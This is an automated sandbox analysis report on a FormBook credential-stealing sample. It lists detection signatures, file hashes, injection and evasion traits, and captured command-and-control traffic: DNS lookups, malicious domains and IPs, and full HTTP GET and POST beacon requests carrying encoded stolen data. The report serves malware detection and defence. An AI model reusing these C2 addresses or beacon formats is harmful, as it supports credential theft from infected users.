Windows Analysis Report
hkLFB22XxS.exe

Overview

General Information

Sample name: hkLFB22XxS.exe
renamed because original name is a hash value
Original sample name: 04268eb791ba671f136525002bd4f25526b6d3e64b2b7b4e169df2498a2ea033.exe
Analysis ID: 1466070
MD5: 46d91dbe786e1518a8715e29f5fba781
SHA1: 5da70934c50a4a626ee73bc4797cfd24e60c5a96
SHA256: 04268eb791ba671f136525002bd4f25526b6d3e64b2b7b4e169df2498a2ea033
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: http://www.rebornqababy.ru/waey/ Avira URL Cloud: Label: malware
Source: http://www.autonomyai.xyz/b2v9/?GBbljTO=0sOIBL6Y1M004sQ5TvZd5iz/+VJrlsE2TnBUG2Cle0uPodabdAFumCtHEYRGqgGZaXBiOoh6miWUokUDwH1uxZLkB2zaEttNK0EmqhWvcq3hRWFyql4+CgnPikYYPSDEc9yry/0=&mB=rL4lP Avira URL Cloud: Label: malware
Source: http://www.erosonline.com.br/2lcx/ Avira URL Cloud: Label: malware
Source: http://www.autonomyai.xyz/b2v9/ Avira URL Cloud: Label: malware
Source: http://www.bulletinnest.com/r7gq/ Avira URL Cloud: Label: malware
Source: http://www.bulletinnest.com/r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2nAD0slqU03Fjqs2wbSr2/73QjcpJUwGjWcGd039QJH+viAIsBs41Zzvp+05pTyuEBiwTKkz9s=&mB=rL4lP Avira URL Cloud: Label: malware
Source: http://www.erosonline.com.br/2lcx/?mB=rL4lP&GBbljTO=a0QfEZLGBdPS9CupDmnnPsWDKzErLSGek8yDxBQcwyKMQFiimN077KRHkaCGiYerfpBHWbRAiBI+CxxxyL+dNlx1E9UxGMH9Wp+KkC7SZXFmjq4jPFSCThF16iUos8QU5jw0D9M= Avira URL Cloud: Label: malware
Source: http://www.rebornqababy.ru/waey/?mB=rL4lP&GBbljTO=vEbjId+4sF/B1HcK0KnkLWhDt3TDgep1Hisls3jx2sXQLvzc6GGIRAe645U1+0UQoLxHlXEWQ40RpQdm4vEPEKgmfigQSYTBcDja0ho8qyrlnSuwRRMraqkdBe97SwcqQ2Bw4z4= Avira URL Cloud: Label: malware
Source: http://bulletinnest.com/r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2 Avira URL Cloud: Label: malware
Source: hkLFB22XxS.exe ReversingLabs: Detection: 67%
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: hkLFB22XxS.exe Joe Sandbox ML: detected
Source: hkLFB22XxS.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: convert.pdb source: svchost.exe, 00000002.00000002.2571611959.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2540180988.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000003.2509356666.0000000000AFB000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578051292.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000000.2493538091.0000000000A0E000.00000002.00000001.01000000.00000005.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4570865384.0000000000A0E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: hkLFB22XxS.exe, 00000001.00000003.2109624765.0000000004110000.00000004.00001000.00020000.00000000.sdmp, hkLFB22XxS.exe, 00000001.00000003.2108731153.0000000004260000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2478694477.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2476600596.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.000000000309E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4579007671.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4579007671.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2573868861.0000000002BFF000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2571707288.00000000029F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: hkLFB22XxS.exe, 00000001.00000003.2109624765.0000000004110000.00000004.00001000.00020000.00000000.sdmp, hkLFB22XxS.exe, 00000001.00000003.2108731153.0000000004260000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2478694477.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2476600596.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.000000000309E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, convert.exe, 00000008.00000002.4579007671.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4579007671.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2573868861.0000000002BFF000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2571707288.00000000029F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: convert.pdbGCTL source: svchost.exe, 00000002.00000002.2571611959.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2540180988.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000003.2509356666.0000000000AFB000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578051292.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: convert.exe, 00000008.00000002.4580175851.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000008.00000002.4573809328.0000000002904000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.0000000002DCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2852069782.000000003189C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: convert.exe, 00000008.00000002.4580175851.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000008.00000002.4573809328.0000000002904000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.0000000002DCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2852069782.000000003189C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00874696 GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00874696
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_0087C9C7
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087C93C FindFirstFileW,FindClose, 1_2_0087C93C
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_0087F200
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_0087F35D
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_0087F65E
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00873A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00873A2B
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00873D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00873D4E
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_0087BF27
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_0024BB30 FindFirstFileW,FindNextFileW,FindClose, 8_2_0024BB30
Source: C:\Windows\SysWOW64\convert.exe Code function: 4x nop then xor eax, eax 8_2_00239720
Source: C:\Windows\SysWOW64\convert.exe Code function: 4x nop then mov ebx, 00000004h 8_2_02AA0548

Networking

barindex
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49719 -> 65.181.132.158:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49724 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49730 -> 203.161.43.228:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49734 -> 38.47.158.215:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49738 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49743 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49747 -> 15.197.142.173:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49751 -> 108.186.253.49:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49755 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49759 -> 87.236.19.243:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49763 -> 135.181.212.206:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49768 -> 191.6.208.133:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49772 -> 188.114.97.3:80
Source: DNS query: www.cloudsoda.xyz
Source: DNS query: www.d99qtpkvavjj.xyz
Source: DNS query: www.autonomyai.xyz
Source: Joe Sandbox View IP Address: 203.161.43.228 203.161.43.228
Source: Joe Sandbox View IP Address: 135.181.212.206 135.181.212.206
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View ASN Name: PEGTECHINCUS PEGTECHINCUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_008825E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 1_2_008825E2
Source: global traffic HTTP traffic detected: GET /r4wk/?mB=rL4lP&GBbljTO=x9GkKIHXkLsCiyVr8u8o1dWkHkpveCE8pq06snQr36Jjj9CRM0vMnoakwWLgrIMHyYBq6SPCqUTgPlgJ6rJOIdv2Hpbl0D0DeBG+01R28dU1nzrJm0yQzAnZDQ+iQUJ8Z49zmcM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.jl884.vipUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /r4rr/?mB=rL4lP&GBbljTO=P1tofVXty140xBSVPpIW7gyirVvbbq4ZmtvRMfQ3vINp97U+jPeKOpbNf/zhxpBeUYTaF1cbY1dyJwJUzhljlqDDW4HDHYbLyZqwGog3PQGSgYYOSWyGo81KbSWrkgyrx66NLVM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.d99qtpkvavjj.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /02nb/?GBbljTO=wAM00RPxm4SI4CXmbVVIy3I1PpnrRkiLCY5B6OI1JPNyCoxACldRit5a2XiaNEn9mU81Z8Y/J9c7Sme1Jv71eMMWXuG1yY1QMiMjNPzXdj8brJHDqS7NAGlwA4SgIkhB8sM3B24=&mB=rL4lP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.firmshow.topUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /g67v/?mB=rL4lP&GBbljTO=c8M7uxZhudpInUsrkR2DFEXxpEFo+k2F1tpwZ/KeEHHRQR8ISdL3H7dZekm83GXANV8iiloQGx74ti2jjfGNAYcI3yUU4CBSy8RpmuksmnDwDcPq/qJ2CnRI4iJcuZj+GnE/ihc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.jl800.vipUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /frbh/?GBbljTO=Ab6vpDSK2Brwe75JZoMyqaMvDHsAkCPA2P9OUDXWAzTXqR+fdlaTQvVfgW4hOBJepAqkmb7wk13CIWkS+xjXxgvfntXYbzbMYjBsDXbn2M5yrvr+d9Np/nCfHBQ0eV5fDAaNGRM=&mB=rL4lP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.theridleysuk.co.ukUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /a7b7/?mB=rL4lP&GBbljTO=WBvhIJsiSZ/Mpf8vspJrW/4pjpLKDJYga2inWWxcAarnmjt55lmBuwg8tb7lhDgj0p/kM0sabX/Eh7nxTer92pVV4vHw9Nn4rOH01OSzROy3Dd2AlIGGpSa7+8s++24x8ediPqQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.dexiangovernment.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /b2v9/?GBbljTO=0sOIBL6Y1M004sQ5TvZd5iz/+VJrlsE2TnBUG2Cle0uPodabdAFumCtHEYRGqgGZaXBiOoh6miWUokUDwH1uxZLkB2zaEttNK0EmqhWvcq3hRWFyql4+CgnPikYYPSDEc9yry/0=&mB=rL4lP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.autonomyai.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /ofk1/?mB=rL4lP&GBbljTO=BhKqFmuQRptfX/n+GLbvkgrrHWTCYt1Sl5iEedmrVDCnsV4u7G/8RrJF9Ts24XSLey5WO/1p/DVfbDYr/r26W2Tj1BdpAMniD2/mHks2VLu3GzKm6FI2X0B8Walyh6GsFs9hylc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.faxinguxn6.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /4ez3/?GBbljTO=mfYMsQM3KyhOB9S5RaSW2y5rLmzLgjaa/QLQwIqVV5WYQs45zP0evK7Rjl9k70QaNBAPkr49MsiTFVYwFYBU4UL5Zbi/2lnbDdmhQHx5hvKSlaviHFa+lVmdn2kx/MOS+LGOACo=&mB=rL4lP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.hereboy.co.ukUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /waey/?mB=rL4lP&GBbljTO=vEbjId+4sF/B1HcK0KnkLWhDt3TDgep1Hisls3jx2sXQLvzc6GGIRAe645U1+0UQoLxHlXEWQ40RpQdm4vEPEKgmfigQSYTBcDja0ho8qyrlnSuwRRMraqkdBe97SwcqQ2Bw4z4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.rebornqababy.ruUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2nAD0slqU03Fjqs2wbSr2/73QjcpJUwGjWcGd039QJH+viAIsBs41Zzvp+05pTyuEBiwTKkz9s=&mB=rL4lP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.bulletinnest.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /2lcx/?mB=rL4lP&GBbljTO=a0QfEZLGBdPS9CupDmnnPsWDKzErLSGek8yDxBQcwyKMQFiimN077KRHkaCGiYerfpBHWbRAiBI+CxxxyL+dNlx1E9UxGMH9Wp+KkC7SZXFmjq4jPFSCThF16iUos8QU5jw0D9M= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.erosonline.com.brUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /yhnb/?GBbljTO=86bcI2qL6Ck2EEXjt07/da0+FqeEti6E2PrLBpyTIXPFyvdDByTjqw0HMrkRgwgyVhVHjteWGV6y9HyWgZi3RwvVIvWEZBOaOAOWOeC1I2qg94IuubjyoeGZ/2oiDpUvJToX5v0=&mB=rL4lP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.cavetta.org.mtUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic DNS traffic detected: DNS query: www.jl884.vip
Source: global traffic DNS traffic detected: DNS query: www.cloudsoda.xyz
Source: global traffic DNS traffic detected: DNS query: www.d99qtpkvavjj.xyz
Source: global traffic DNS traffic detected: DNS query: www.firmshow.top
Source: global traffic DNS traffic detected: DNS query: www.jl800.vip
Source: global traffic DNS traffic detected: DNS query: www.theridleysuk.co.uk
Source: global traffic DNS traffic detected: DNS query: www.dexiangovernment.org
Source: global traffic DNS traffic detected: DNS query: www.autonomyai.xyz
Source: global traffic DNS traffic detected: DNS query: www.faxinguxn6.cn
Source: global traffic DNS traffic detected: DNS query: www.hereboy.co.uk
Source: global traffic DNS traffic detected: DNS query: www.rebornqababy.ru
Source: global traffic DNS traffic detected: DNS query: www.bulletinnest.com
Source: global traffic DNS traffic detected: DNS query: www.erosonline.com.br
Source: global traffic DNS traffic detected: DNS query: www.cavetta.org.mt
Source: unknown HTTP traffic detected: POST /r4rr/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 212Host: www.d99qtpkvavjj.xyzOrigin: http://www.d99qtpkvavjj.xyzReferer: http://www.d99qtpkvavjj.xyz/r4rr/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 47 42 62 6c 6a 54 4f 3d 43 33 46 49 63 6a 62 4d 38 68 67 71 6a 69 4b 51 66 70 77 2f 35 30 62 70 69 43 69 6a 59 37 5a 43 33 39 44 59 46 76 55 44 77 4c 4a 50 37 4a 64 4b 77 4a 71 70 4f 70 50 77 59 64 71 67 32 62 52 57 53 36 54 5a 5a 48 4e 6d 48 48 74 70 4a 67 4e 44 79 77 5a 36 34 4b 57 53 54 66 66 6e 4e 35 53 49 32 61 6d 67 57 59 67 66 46 69 4f 48 34 66 6b 67 44 52 50 76 73 74 68 38 55 69 4b 71 6b 69 6d 56 33 36 32 46 4b 52 42 4f 65 48 58 79 46 59 53 63 62 45 6d 54 78 65 78 67 5a 75 6e 49 76 2f 43 4d 7a 6a 2f 73 42 68 58 72 36 6b 6b 72 36 34 42 30 48 47 67 4c 6f 47 76 52 4c 2b 72 54 7a 37 68 5a 57 39 68 7a 64 78 6f 7a 51 4b 65 46 Data Ascii: GBbljTO=C3FIcjbM8hgqjiKQfpw/50bpiCijY7ZC39DYFvUDwLJP7JdKwJqpOpPwYdqg2bRWS6TZZHNmHHtpJgNDywZ64KWSTffnN5SI2amgWYgfFiOH4fkgDRPvsth8UiKqkimV362FKRBOeHXyFYScbEmTxexgZunIv/CMzj/sBhXr6kkr64B0HGgLoGvRL+rTz7hZW9hzdxozQKeF
